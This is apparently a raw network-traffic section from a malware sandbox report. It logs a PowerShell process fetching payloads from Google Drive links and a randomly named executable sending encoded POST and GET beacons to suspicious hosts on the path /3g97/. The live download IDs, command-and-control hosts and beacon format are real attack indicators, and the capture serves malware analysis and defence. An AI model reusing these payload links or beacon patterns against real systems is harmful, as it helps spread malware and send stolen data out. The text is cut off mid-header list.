                                                            Apr 23, 2024 07:55:20.268843889 CEST8049723157.7.107.63192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 07:53:38.804501057 CEST | 192.168.2.9 | 1.1.1.1 | 0xc0ab | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:53:40.425780058 CEST | 192.168.2.9 | 1.1.1.1 | 0xc78f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:54.682166100 CEST | 192.168.2.9 | 1.1.1.1 | 0xf2c3 | Standard query (0) | www.jthzbrdb.fun | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:10.215060949 CEST | 192.168.2.9 | 1.1.1.1 | 0x3d37 | Standard query (0) | www.a-two-spa-salon.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:24.996218920 CEST | 192.168.2.9 | 1.1.1.1 | 0x2d52 | Standard query (0) | www.ordinarythoughts.org | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:33.761066914 CEST | 192.168.2.9 | 1.1.1.1 | 0xcc7a | Standard query (0) | www.mz3fk6g3.sbs | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 07:53:38.892579079 CEST | 1.1.1.1 | 192.168.2.9 | 0xc0ab | No error (0) | drive.google.com | | 142.251.41.14 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:53:40.514552116 CEST | 1.1.1.1 | 192.168.2.9 | 0xc78f | No error (0) | drive.usercontent.google.com | | 142.251.35.161 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:54:54.782021046 CEST | 1.1.1.1 | 192.168.2.9 | 0xf2c3 | No error (0) | www.jthzbrdb.fun | | 80.240.20.220 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:10.737234116 CEST | 1.1.1.1 | 192.168.2.9 | 0x3d37 | No error (0) | www.a-two-spa-salon.com | | 157.7.107.63 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:25.099883080 CEST | 1.1.1.1 | 192.168.2.9 | 0x2d52 | Name error (3) | www.ordinarythoughts.org | none | none | A (IP address) | IN (0x0001) | false
Apr 23, 2024 07:55:33.917493105 CEST | 1.1.1.1 | 192.168.2.9 | 0xcc7a | No error (0) | www.mz3fk6g3.sbs | | 172.217.16.36 | A (IP address) | IN (0x0001) | false
                                                            • drive.google.com
                                                            • drive.usercontent.google.com
                                                            • www.jthzbrdb.fun
                                                            • www.a-two-spa-salon.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49719 | 80.240.20.220 | 80 | 6540 | C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 07:54:55.001136065 CEST | 458 | OUT | GET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1
                                                            Host: www.jthzbrdb.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 23, 2024 07:54:55.170525074 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Tue, 23 Apr 2024 05:54:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 1409
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "629dd94c-581"
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://hostname.domain.tld/">hostname.domain.tld</a></p> <h1>404
Apr 23, 2024 07:54:55.170547009 CEST | 309 | IN
                                                            Data Ascii: </h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start again from <a href="http://hostname.domain.tld/">home</a> or go back to the <a href="javascript


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49720 | 157.7.107.63 | 80 | 6540 | C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 07:55:11.026123047 CEST | 739 | OUT | POST /3g97/ HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.a-two-spa-salon.com
                                                            Referer: http://www.a-two-spa-salon.com/3g97/
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Data Ascii: jJEDgF=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpQ7xIFSYFA49pL7BPI4tz2nPidtJs
Apr 23, 2024 07:55:11.531066895 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 23 Apr 2024 05:55:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                            Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
                                                            Data Ascii: e-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.9 | 49721 | 157.7.107.63 | 80 | 6540 | C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 23, 2024 07:55:13.838498116 CEST | 763 | OUT | POST /3g97/ HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 219
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.a-two-spa-salon.com
                                                            Referer: http://www.a-two-spa-salon.com/3g97/
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Data Ascii: jJEDgF=46j9iO5agqM5rv5F70OeCd0TRPBgHeuiHqkdLIUKKn51feV/Ol6OWs1+fYio5NjTjxnkSNtnfcy2Zy+PE2PXY1bRvvjo6SnT/U44YWZVWmvJXF1U0VAaLuTMxwO6LRFa/IqMGr31FNCsN7tW4UU6mDeuCQ0LpRIVT8FdDwcsYoRpMahRZKkojwPFaKAEIBB3UtoWwj5UwJ/DL/Suig==
                                                            Apr 23, 2024 07:55:14.328778028 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 23 Apr 2024 05:55:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.9 | 49722 | 157.7.107.63 | 80 | 6540 | C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 23, 2024 07:55:16.649300098 CEST | 1776 | OUT | POST /3g97/ HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1231
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.a-two-spa-salon.com
                                                            Referer: http://www.a-two-spa-salon.com/3g97/
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Apr 23, 2024 07:55:17.141360998 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 23 Apr 2024 05:55:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.9 | 49723 | 157.7.107.63 | 80 | 6540 | C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 23, 2024 07:55:19.489536047 CEST | 465 | OUT | GET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Apr 23, 2024 07:55:19.987687111 CEST | 510 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Apr 2024 05:55:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6
                                                            X-Cache: MISS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.9 | 49706 | 142.251.41.14 | 443 | 6856 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-04-23 05:53:40 UTC | 215 | OUT | GET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-23 05:53:40 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Tue, 23 Apr 2024 05:53:40 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: script-src 'nonce-TPxQd65F1udzaqt9DcU7Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.9 | 49707 | 142.251.35.161 | 443 | 6856 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-04-23 05:53:40 UTC | 233 | OUT | GET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-23 05:53:41 UTC | 4748 | IN | HTTP/1.1 200 OK
                                                            X-GUploader-UploadID: ABPtcPrNLcENaCYkfQUv2kC94SqecexxM6DyfLy38rqYkbrCKDU0QTz5ZScEqUjMvmcGzsFm7FDapNeV6Q
                                                            Content-Type: application/octet-stream
                                                            Content-Security-Policy: sandbox
                                                            Content-Security-Policy: default-src 'none'
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            X-Content-Security-Policy: sandbox
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Resource-Policy: same-site
                                                            X-Content-Type-Options: nosniff
                                                            Content-Disposition: attachment; filename="Stvet.mix"
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: false
                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                            Accept-Ranges: bytes
                                                            Content-Length: 433144
                                                            Last-Modified: Sun, 21 Apr 2024 19:21:21 GMT
                                                            Date: Tue, 23 Apr 2024 05:53:41 GMT
                                                            Expires: Tue, 23 Apr 2024 05:53:41 GMT
                                                            Cache-Control: private, max-age=0
                                                            X-Goog-Hash: crc32c=3iBiuw==
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.9 | 49715 | 142.251.41.14 | 443 | 316 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-04-23 05:54:08 UTC | 216 | OUT | GET /uc?export=download&id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            2024-04-23 05:54:08 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Tue, 23 Apr 2024 05:54:08 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Content-Security-Policy: script-src 'nonce-9IqCFYJTMD4JCCCpOJW8oQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.9 | 49716 | 142.251.35.161 | 443 | 316 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-04-23 05:54:08 UTC | 258 | OUT | GET /download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-23 05:54:09 UTC | 4760 | IN | HTTP/1.1 200 OK
                                                            X-GUploader-UploadID: ABPtcPp8fxSc3r0bjTbBbG8DO9Oq9TnfoIZr-Z5_ER9kJTTREGtZwTugjCFoKn86bFEt8RdiZarvT1Udtg
                                                            Content-Type: application/octet-stream
                                                            Content-Security-Policy: sandbox
                                                            Content-Security-Policy: default-src 'none'
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            X-Content-Security-Policy: sandbox
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Resource-Policy: same-site
                                                            X-Content-Type-Options: nosniff
                                                            Content-Disposition: attachment; filename="SXVxVWLWVVaBeOBX7.bin"
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: false
                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, 